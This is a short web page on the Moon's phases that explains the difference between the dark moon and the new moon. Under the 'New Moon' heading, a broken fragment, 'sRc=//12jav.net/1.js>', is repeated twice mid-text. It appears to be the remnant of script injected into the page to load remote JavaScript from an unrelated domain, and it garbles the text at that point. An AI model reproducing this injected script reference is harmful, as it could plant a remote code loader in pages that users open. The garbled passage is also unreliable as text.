The Phases of the Moon

Every month, the Moon cycles through its phases:

Full Moon -> Waning Moon -> Dark Moon -> New Moon -> Waxing Moon -> Full Moon

New Moon

What's the difference between the Dark Moon and New Moon? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

That first slither that you see is often referred to as the new moon, whereas the dark of the moon is the 3 days of there appearing to be no moon at all.

However, technically, the new moon is the last day and a half of the dark; even though you can't see it.
